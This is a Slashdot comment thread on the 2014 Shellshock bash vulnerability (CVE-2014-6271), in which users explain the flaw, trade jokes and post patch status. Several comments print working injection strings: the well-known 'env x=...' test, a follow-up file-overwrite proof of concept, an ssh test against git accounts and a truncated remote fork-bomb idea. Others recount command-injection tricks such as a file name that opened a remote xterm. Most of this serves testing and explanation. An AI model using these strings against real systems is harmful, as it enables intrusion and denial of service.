Remote Exploit Vulnerability Found In Bash 399
kdryer39 sends this news from CSO: A remotely exploitable vulnerability has been discovered by Stephane Chazelas in bash on Linux, and it is unpleasant. The vulnerability has the CVE identifier CVE-2014-6271. This affects Debian as well as other Linux distributions. The major attack vectors that have been identified in this case are HTTP requests and CGI scripts. Another attack surface is OpenSSH through the use of AcceptEnv variables. Also through TERM and SSH_ORIGINAL_COMMAND. An environmental variable with an arbitrary name can carry a nefarious function which can enable network exploitation.
Dangerous (Score:2)
Re: (Score:2)
Re:Dangerous (Score:5, Funny)
Pfffft. I should have expected Korny jokes. (Ba-dum-csh.)
Re: (Score:3)
Tcsh, tcsh, tcsh on you!
Re:Dangerous (Score:5, Funny)
Re:Dangerous (Score:5, Funny)
Bash has always felt a bit dangerous...
POUND! BANG! SLASH! bin SLASH! BASH!
#!/bin/bash
Full Disclosure can be found on oss-security... (Score:5, Informative)
https://marc.info/?l=oss-security&m=141157106132018&w=2 [marc.info]
Re:Full Disclosure can be found on oss-security... (Score:5, Interesting)
This is exceedingly nasty.
The vulnerability occurs because bash does not stop after processing the function definition; it continues to parse and execute shell commands following the function ...
definition.
The fact that an environment variable with an arbitrary name can be used as a carrier for a malicious function definition containing trailing commands makes this vulnerability particularly severe; it enables network-based exploitation.
This is a weapons-grade exploit IMO, the sort of thing the NSA keeps hidden for when it's really needed. I'm almost surprised it wasn't suppressed.
Hmm, I wonder how many phones are valuable.
Re: (Score:3)
I'm assuming you mean "how many phones are vulnerable."
Only Nokia's N-series phones running Maemo, or Android phones with a Linux chroot are capable of running bash or sshd (without crazy hardcore modding).
Re: (Score:2)
Re: (Score:3)
Otherwise Maemo's default shell was Busybox.
Busybox isn't a shell. The default shell included in busybox is almquist shell (or ash) - so assuming Maemo uses the default it is ash, I can't remember - which is a bourne shell clone and I'm not sure whether ash also has this vulnerability.
Re: (Score:3)
Really? It does require that you give the attacker control over the environment, which is a dubious thing to do in the first place. For the ssh-based attacks, you need to be at least a user on the system, which makes this a local privilege escalation only. Sure, if somebody actually uses bash as basis for CGI, this could be remotely exploitable, but there is no reason to panic.
Re: (Score:3)
The CGI spec tells the Web server to make the user data available as environment variables, so e.g. Apache will put them in the environment, and environment proceses are inherited to all sub-processes, so e.g. a Perl script called via CGI and using back-ticks, my $a = `pwd`; may result in code execution.
The vulnerability doesn't apply to all ways of running code on Web servers, e.g. Java servlet APIs shoud be fine, but CGI does automatically add the HTTP headers and request paramters to the environment.
Re: (Score:2)
Re: (Score:3)
And now it turns out that even patched bash still carries some related security bugs. (Not really a surprise since the parser is complex and bound to, seems like running it on arbitrary environment variables really isn't the best idea...)
So, if you think you are safe,
export X='() { (a)=>\'
bash -c 'brm date'
cat brm
(N.B. the backslash is not inhibiting the apostrophe in shell syntax.)
That is, by crafter environment variables you can still overwrite files and run commands that were supposed to be parameters
Re: (Score:3)
So you don't have bash installed. I'm fucking AMAZED that your bash isn't exploitable!
Re: (Score:2)
Damn...
I would switch to the iChair but you can only face certain selected directions when seated in it...
Re: (Score:3)
OpenBSD is so secure with it's default install because it installs absolutely nothing useful
So now it's the year of the Linux desktop (Score:5, Funny)
Because we've finally become popular enough to warrant script kiddies finding holes in our toys!
Captcha: Outcry
Re:So now it's the year of the Linux desktop (Score:5, Funny)
Re: (Score:2)
You do realize that bash is (nowadays) installed in damned near every *nix out there (though I think HPUX is still holding out.)
Hell, even Solaris started chucking it in at around 5.10 (Solaris 10) or so (or was it 9?), and I thought that would take an act of Congress or the Divine to happen.
(get this - you can even get bash for Windows [sourceforge.net], which might improve that OS by at least a factor of 20).
Comment removed (Score:5, Informative)
Missing in windows? (Score:5, Funny)
I can't find the bash icon in the Start menu. Anyone know where it is so I can remove it and avoid this exploit?
Thanks.
Re:Missing in windows? (Score:5, Funny)
Re:Missing in windows? (Score:5, Interesting)
Seriously though is cygwin's bash vulnerable?
Looks like it is to me, haven't had a chance to check for an update yet though...
Re:Missing in windows? (Score:5, Informative)
I just updated Cygwin to the latest, and yes, it's still vulnerable. (At least its bash-4.1.10-4 is, I suppose it's possible that the mirror I'm using is out of date.)
Re:Missing in windows? (Score:5, Funny)
I can't find the bash icon in the Start menu. Anyone know where it is so I can remove it and avoid this exploit?
Thanks.
You seem to have asked a question about removing the Start Menu.
Upgrade to Windows 8, but do not do the Win8.1 upgrade.
Thank you for using our products in the future.
Re: (Score:3)
You're one up on me. I can't find the Start Menu...
Re: (Score:3)
Whoosh!
Re:Missing in windows? (Score:5, Funny)
Um, that's not a shell that I know of. Citation needed?
CentOS 6.5 already has fixed package available (Score:5, Insightful)
sudo yum update bash
Thank you for the quick warning.
Re:yum: Could not find update match for bash (Score:4, Informative)
sudo mv /bin/bash /bin/woosh
Only CGI scripts affected? (Score:2, Interesting)
So, if I undestand correctly, this affects shell scripts used for CGI; do people actually do that on what scale?
Only person I know who does this is a CS teacher in my college, onhis homepage which he has had since early 90s, are there actually commercial installations which do this, some major product with large install base ("asking this for my son")?
Re: (Score:2)
This also affects other scripting languages executed via CGI if the code spawns a shell, e.g.:
#!/bin/perl
`cat header.html`
It doesn't necessarily affect scripting languages executed via other means, e.g. mod_*
Re: (Score:2)
Any setuid program that would call a bash script directly or indirectly could also be vulnerable.
I predict that in the following days hackers will find several ways to cause local privileges escalations by executing system bash scripts with customized environment variables. That could be as simple as configuring a hidden WiFi network with a customized ESSID.
Re:Only CGI scripts affected? (Score:4, Interesting)
Oh I had the same thought....I mean, by the time an "attacker" is modifying arbitrary environment variables in your process, well...you are already pretty compromised. If you wrote your CGI, then you are the one that compromised yourself.
That said, you know someone does this. Hell, I have had to deal with web applications written mostly in shell and did much of their processing in shell.... the only thing that really topped it for idiocy was when I dove into some perl4 code for a password change form and found this gem:
$password = $q->param('password'); /usr/dict/words`" != "" {
if "`grep $password
}
No taint checking, nothing, just shell out with whatever someone put in the form. I loaded it up and added a "; touch /tmp/foo" on the end and verified there was no protection, then I found 4 more similar errors and figured that since security issues were not even why I opened the code to read it....I re-wrote it from scratch.
Re: (Score:2)
Wow, that's a special kind of stupid right there.
Re: (Score:3)
Ill top that one, back in the late 90's I was hired to check out an ISP's security. I was given standard user access to the web front end.
They had a routine to un-tar/zip/etc a file. You could free form the file name so i entered
junk.tgz:xterm -display my.IP.Addr:0.0
To my surprise There was an xterm on my linux box right to their server, with full root access.
Re: (Score:3)
If you think that is bad, you should see the parts I didn't mention, the contents of that if statement was something like "$ERRORNO = 101"
The structure of the program was very simple....it had 4 functions which were called in sequence, each one would set global variables, which would be read by the other. So, if ERRORNO was set, a whole nother function with a whole different big if statement block would then print out the error message..... which is why I opened the code up...one of the errors was wrong.
So
Re: (Score:2)
A friend of mine wrote a small web application for french conjugation, with verbiste (https://launchpad.net/ubuntu/+source/verbiste).
You type a verb, and it gives you a table like this one :
http://french.about.com/od/ver... [about.com]
My verb was "avoir && whoami", and its conjugation was "root" :D
Not arbitrary variables - QUERY_STRING (Score:5, Informative)
> Oh I had the same thought....I mean, by the time an "attacker" is modifying arbitrary environment variables in your process, well...you are already pretty compromised. If you wrote your CGI, then you are the one that compromised yourself.
The contents of the CGI script don't matter. The exploit occurs before the script runs. It happens as bash is setting up the environment in which the script will be run.
Suppose you have pwd.cgi, which prints the name of the current directory:
#!/bin/sh
echo -e "Content-type: text/plain\n\n"
pwd
Notice the script uses no input at all. It is potentially vulnerable. Here's why. Suppose you did want to validate your input. You'd look at the contents of $QUERY_STRING, right? You can find what the user entered in the QUERY_STRING environment variable because bash puts it there. That's the step where the problem lies - bash can EXECUTE the contents of the query string while setting the environment variable. This occurs before the user's script even begins to run.
Re: (Score:2)
Thank You, raymorris. I'd read most of the thread and still didn't have a clear idea of the problem.
Re:Not arbitrary variables - QUERY_STRING (Score:5, Informative)
Setup a local cgi script on your Linux machine. Telnet into its port 80. Assuming your cgi script is at /cgi-bin/test.sh, type the following in the telnet prompt:
GET
Host: localhost
Custom: () {
Press ENTER twice after the last header.
If you don't use a shell builtin, the shell ends with a segfault and Apache shows an error, but the command is executed server-side. Scary.
Re: (Score:3)
I'm trying to figure out if the OpenSSH vectors are actually remote exploits or just a privilege escalation in a remote access tool. From what I understand, a user has to be authenticated to get access to any of the variables this exploit can run through.
Re: (Score:3)
Yes. This only works if the user has an account. But he might be able to break out of a locked-down account which only runs a specific command.
git@ shell accounts using gitolite and gitosis (Score:2)
You can get shell on git@ accounts set up with gitolite and gitosis, at least some of their versions will use /bin/bash as the login shell (and only use ~/.ssh/authorized_keys to restrict the commands). One easy way to check whether your git server account is vulnerable:
ssh git@yourgitserver '() { echo $1; }; /usr/bin/id'
Re: (Score:2)
Or a CGI script written in a some other lanaguage - like python or perl - or a binary that is on a system with bash as the default shell and which calls the system function in libc (or an equivalent) since that will execute /bin/sh.
There will be a lot of such cases - running a "mail" command or something from imagemagick and so on.
one-liner df.cgi, uptime.cgi (Score:2)
Many, many sites have one line scripts like this laying around:
#!/bin/sh
echo -e "Content-type: text/plain\n\n"
df -h
Or similarly, a script that just runs pwd or uptime.
Re: (Score:2)
CGI passes parameters through environment variables, like the request URI and user agent and everything else, to the forked process that handles the request. If the process a) is a bash script itself or b) fork-execs a child bash or /bin/sh linked to bash, without sanitizing/wiping EVERY environment variable (even ones the script doesn't use!), then it can execute arbitrary code.
Really, there needs to be a better, saner language for easily composing prewritten executables. I hate shell syntax anyway.
Re: (Score:2)
If you're using fastcgi with a wrapper script (the recommended configuration for mod_fcgid+PHP [apache.org]), it's time to check the wrapper script. It should not need to be a bash script.
FCGIWrapper /usr/lib/cgi-bin/php5-wrapper .php
Re: (Score:2)
When using the wrapper, apache spawns the fastcgi server on the first request if it is not already running.
Already fixed in Debian... (Score:5, Informative)
Re: (Score:3)
I wonder if Debian's default /bin/sh being dash instead of bash reduces the attack surface somewhat. Do usual configurations of web servers (and others listed in TFA) call /bin/sh or /bin/bash directly?
Hindsight is 20/20 obviously, but it makes sense to use a shell with limited features in cases where limited features are enough (especially when remotely accessible). On the other hand, now you've got two shells with potential security issues instead of just one.
Re: (Score:2)
On repo.or.cz, as login shell for all git user accounts we use a shell script that does some verifications, shows nice error messages etc. Thankfully, #!/bin/sh is at the top of the script and that's dash on the Debian server; otherwise, we would have been vulnerable. (Only getting into a chroot as non-root, but still...)
Re: (Score:2)
Fixed in wheezy (v7), but not squeeze (v6). Status: https://security-tracker.debia... [debian.org]
And in Gentoo (Score:3)
app-shells/bash-4.2_p47-r1 is not vulnerable. I just updated.
Thanks god (Score:4, Funny)
Thanks god I am using windows.
Re:Thanks god (Score:5, Funny)
Re: (Score:2)
Re: (Score:2)
Re: (Score:3)
Thats not a powershell vulnerability, its a piece of malware written in Powershell.
What you said would be like claiming C++ exploits because many viruses are written in C++.
Test string here: (Score:5, Informative)
env x='() {
Re: (Score:3)
I have to admit, my suspicous old self had to spend a minute making sure this wasn't a fork bomb. Which, I have to say, this would be the perfect thread for if you were into that sort of mischief. In any case, yah that shouldn't worl. That really shouldn't work at all.
Re: (Score:2)
=)
I too was suspicious of that fork-bomb potential. So the first time I ran it was on a test-vm.
I'm glad I am not the only paranoid one.
Re: (Score:2)
> I too was suspicious of that fork-bomb potential. So the first time I ran it was on a test-vm.
lol well, as annoying as they can be, I have beaten a fork bomb before without rebooting so, I was confident enough after a quick perusal to not be afraid, especially since....come on, the function isn't even being called how can it possibly exec.....fuck
Re: (Score:2)
was vulnerable (on debian), :;}; echo vulnerable' bash -c "echo this is a test" :;}; echo vulnerable' bash -c "echo this is a test"
$ env x='() {
vulnerable
this is a test
Just ran apt-get update and upgrade and :
$ env x='() {
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test
Re: (Score:2)
Re: (Score:2)
Re:Test string here: (Score:5, Informative)
The (ancient) version of bash that ships with OS X appears vulnerable. Luckily, as a remote exploit, only authenticated ssh sessions and cgi scripts etc expose it, so most single user workstations (of all OSs) should be safe.
If this is a bash exploit, and not a Linux exploit, why all of the focus on Linux in the article? I use bash on many different OSs.
Re:Test string here: (Score:5, Informative)
I just tried it on 2 different version s of OSX: 10.9.4 and 10.7.5 and confirm that they print out the "vulnerable" message
Re: (Score:2)
Fixed on Homebrew [brew.sh].
Re: (Score:2)
That's a good question. I'm seeing my IRIX systems at home as vulnerable, but I have AcceptEnv disabled in sshd_config, and am not running web servers on them - I feel like the attack vectors are limited.
But your point is valid - ANY OS that uses Bash is a target.
Re: (Score:3)
Re:Test string here: (Score:5, Informative)
SSH into your host.
from the bash prompt just paste the above string.
i.e. :;}; echo vulnerable' bash -c "echo this is a test"
user@host $env x='() {
--------------------
If you see:
vulnerable
this is a test
Then you are vulnerable and need to update your system.
If all you see is:
this is a test
Then you are ok.
Re: (Score:3)
I was actually just thinking another way to use this might be to have ssh pass x='() { :;}; echo vulnerable' as a variable to remote systems, that way whenever you login to a remote system, it just tells you whether it is vulnerable or not on login.
Re:Test string here: (Score:5, Informative)
env x='() {
probably won't work on most systems but
env LC_FRED='() {
will if the server is configured to accept the LC_* environment variables with the AcceptEnv directive in sshd_config.
Got the bash update this mawning for my Debian... (Score:2)
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test
$ bash --version
bash --version
GNU bash, version 4.2.37(1)-release (x86_64-pc-linux-gnu)
This is from my Debian stable box.
Is that good or bad? :O
Really? Using bash for CGI? (Score:4, Interesting)
All the systems I've done security pen tests against that were using bash for CGI were so easy to hack via other means it wasn't funny. And of course that web server CGI was running as root so root shell and done.
Stop using Bash for CGI unless you want to get pwned. Similar theme with 90% of the Perl CGI I run into.
Re: (Score:2)
From the CVE, I'm pretty sure the problem isn't limited to CGI written in Bash. The problem affects any CGI that *calls* bash, which means any call to system() in any language is going to cause a problem.
Re: (Score:3)
The problem affects any CGI that *calls* bash, which means any call to system() in any language is going to cause a problem.
Nowadays, on most systems, /bin/sh is a proper Bourne Shell (either ash or dash), and no longer bash. So system() should no longer be an issue, but explicitly calling bash still would be...
Terminal vulnerabilities (Score:3)
My favorite of this sort of thing is CVE-2009-1717, which was a bug in Apple's terminal emulator in Mac OS X. Sending certain escape sequences to it caused it to blow up and potentially execute code. What was fun is that putting a "telnet://" link in a web page would automatically cause Mac OS X to automatically open a terminal and connect to a remote host with no prompting by the user. It was a pretty neat vulnerability.
Exploit depends on not validating input? (Score:3)
Someone correct me if I'm mistaken, but doesn't this exploit depend on programs not validating input?
The example given in the post to oss-security mentions HTTP request headers containing malicious data being passed into CGI programs which then call out to Bash. Wouldn't taint-checking input eliminate that attack vector?
Re: (Score:3)
It's not being passed in as usual data, it's being passed in as environment variables, most programmers ignore all the variables that are not relevant to their program (which is usually all of them).
Re: (Score:3)
When httpd runs a CGI script, it passes data to the script with bash environment variables. That means the code would be executed by httpd in whatever context it runs CGI scripts. The CGI script itself hasn't even been executed yet.
You are mistaken. No input processing needed (Score:4, Informative)
> Someone correct me if I'm mistaken, but doesn't this exploit depend on programs not validating input?
Suppose you have pwd.cgi, which prints the name of the current directory:
#!/bin/sh
echo -e "Content-type: text/plain\n\n"
pwd
Notice the script uses no input at all. It is potentially vulnerable. Here's why. Suppose you did want to validate your input. You'd look at the contents of $QUERY_STRING, right? You can find what the user entered in the QUERY_STRING environment variable because bash puts it there. That's the step where the problem lies - bash can EXECUTE the contents of the query string while setting the environment variable. This occurs before the user's script even begins to run.
Re: (Score:2)
Does your home router have any cgi scripts that use bash?
Even if it did, it only serves web pages to IPs on the "LAN" side, right?
If not, you've already been pwned long ago.
http CGI scripts? Did I get stuck in 1996? (Score:2)
So far, HTTP requests to CGI scripts have been identified as the major
attack vector.
Umm.. who still does that? That sounded wonky, risk-prone, and a hack in the mid 90s. Who's still using CGI scripts to execute shell code?
wtf (Score:2)
Who does CGI with anything but a restricted shell these days? And should we shoot them now, or after they fix their scripts?
Re: (Score:2)
it affects other things than CGI, remote services that call bash for example: dhcp client being one listed in Redhat's CVE page
so a remote fork bomb is possible? (Score:5, Interesting)
Re:so a remote fork bomb is possible? (Score:5, Interesting)
env LC_BOMB='() {
And if some_user is using bash and the ssh daemon on the system is configured with AcceptEnv LC_*, which most of them are, you'll end up with an awesome remote fork bomb.
Worse than you think. (Score:5, Interesting)
Almost *ANY* CGI is vulnerable, because the way CGI works is by environment variables. And the attacker can control them. You don't have to be doing anything stupid or wrong to be affected. It looks like other ways of executing web applications (e.g., mod_php) are safe - to the extent that they don't use a popen or a system() or something, which is a pretty common thing to do.
Your DHCP client (on a Linux) machine passes data to its hooks via environment variables. These can be set by the attacker. Even better, it's running as root. Boom, connect to a rogue AP and get rooted while receiving an address assignment.
You probably do Git commits via a (locked-down) SSH login. That's compromised.
Shells are everywhere. Again, this doesn't require your application to have screwed up. This is a flaw in how environment variables are parsed and set, which is something that was presumed safe, so nobody thought about it. Bad bad bad bad. Not Heartbleed bad, but close.
Detailed info from RedHat (Score:4, Informative)
Example attacks are listed on Red Hat's security blog. [redhat.com]
Re: (Score:2)
Has Netcraft unconfirmed the death?
Re: (Score:2)
Because MS hates standards. Their first vowel for exploitable software is 'i'. If you think that doesn't hold up, prepend Microsoft or Windows.
Re: (Score:3)
Well, that's OK. i is like a for large enough values of a (or really small values of i).
And depending on what part of the world you're in, the sound of vowels can change quite a bit.
A few years back, my wife's mother and some friends were in the southern US ..
Re: (Score:2)
Yes, because it's not a Linux hole. GNU Bash is the vulnerable software. So if you have Bash installed, you're vulnerable (I'm about to test the vulnerability myself).
Re: (Score:2)
Why do people say/write "environmental" variable? I've never seen the that word used in shell documentation or any literature on *nix written by competent authorities. It's "environment variable."
It's due to global warming.
Re: (Score:3)
Re: (Score:3)
Well I don't know much bash, so I figured out why this is happening, though it still seems unbelievable.
Apparently the normal way to define a function is to write "x() {...}". But it stores it in an environment variable for some reason, I think so that a recursively called bash gets the same function definition.
To support that, on startup it scans the environment for variables starting with "() {" (spacing must be exactly that). It then defines the function by pasting the variable name onto the start of the